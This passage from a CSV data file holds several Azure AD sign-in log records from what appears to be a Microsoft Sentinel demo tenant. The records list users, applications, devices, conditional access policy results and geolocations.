5.0.5.0'}",92a793e7-449c-4cea-9c2e-f07949680a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,92a793e7-449c-4cea-9c2e-f07949680a00,SigninLogs,Sucess,36.6404686,-78.26995087
+836,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:53.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5aa89993-9263-4e32-acc0-4be3816e6de4,Microsoft.aadiam,Microsoft.aadiam,,Sridhar Periyasamy,4,CA,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 01:21,"{'operatingSystem': 'Windows 10', 'deviceId': '92720cc2-dd49-4250-a03f-8aa941f16177', 'browser': 'Chrome 80.0.3987', 'displayName': 'SRIDHAR-SBOOK', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",68d708e5-0f59-4f58-b7ee-efd276a30600,,,"{'countryOrRegion': 'CA', 'geoCoordinates': {'longitude': -119.27671813964844, 'latitude': 50.238258361816406}, 'state': 'British Columbia', 'city': 'Vernon'}",none,none,none,none,[],{'errorCode': 0},Sridhar Periyasamy,0dd4a385-2ff9-4fcb-9798-f748c832b74a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,68d708e5-0f59-4f58-b7ee-efd276a30600,SigninLogs,Sucess,50.23825836,-119.2767181
+837,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:04.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d38766bd-fa8f-4ac5-bc74-ec411acd1b32,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 00:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6f905d6a-b8b5-48fe-8361-59d7754d0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6f905d6a-b8b5-48fe-8361-59d7754d0600,SigninLogs,Sucess,36.6404686,-78.26995087
+838,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:04.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d38766bd-fa8f-4ac5-bc74-ec411acd1b32,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 00:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6f905d6a-b8b5-48fe-8361-59d7754d0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6f905d6a-b8b5-48fe-8361-59d7754d0600,SigninLogs,Sucess,36.6404686,-78.26995087
+839,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,04559467-e7f5-4383-92ff-2f1e6e0c2caf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 02:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",92a793e7-449c-4cea-9c2e-f07949680a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,92a793e7-449c-4cea-9c2e-f07949680a00,SigninLogs,Sucess,36.6404686,-78.26995087
+840,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:53.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5aa89993-9263-4e32-acc0-4be3816e6de4,Microsoft.aadiam,Microsoft.aadiam,,Sridhar Periyasamy,4,CA,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 01:21,"{'operatingSystem': 'Windows 10', 'deviceId': '92720cc2-dd49-4250-a03f-8aa941f16177', 'browser': 'Chrome 80.0.3987', 'displayName': 'SRIDHAR-SBOOK', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",68d708e5-0f59-4f58-b7ee-efd276a30600,,,"{'countryOrRegion': 'CA', 'geoCoordinates': {'longitude': -119.27671813964844, 'latitude': 50.238258361816406}, 'state': 'British Columbia', 'city': 'Vernon'}",none,none,none,none,[],{'errorCode': 0},Sridhar Periyasamy,0dd4a385-2ff9-4fcb-9798-f748c832b74a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,68d708e5-0f59-4f58-b7ee-efd276a30600,SigninLogs,Sucess,50.23825836,-119.2767181
+841,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:09.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbcd7f19-25f4-4cfd-824c-94dc41d50000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cbcd7f19-25f4-4cfd-824c-94dc41d50000,SigninLogs,Sucess,33.0175209,35.44601059
+842,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:05.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfcf3990-7152-4749-81ff-b96f50d59f00,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 6,4,IN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",48924ade-b17e-45fa-8de4-53ac831d4400,,,"{'countryOrRegion': 'IN', 'geoCoordinates': {'longitude': 75.88970184326172, 'latitude': 22.797740936279297}, 'state': 'Madhya Pradesh', 'city': 'Shakkar Khedi'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 6,dd7e1752-57a8-4e72-8589-6a68e4a1f500,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,48924ade-b17e-45fa-8de4-53ac831d4400,SigninLogs,Sucess,22.79774094,75.88970184
+843,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1d6ec426-1ef8-457b-8cf8-efe5c84c21f0,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 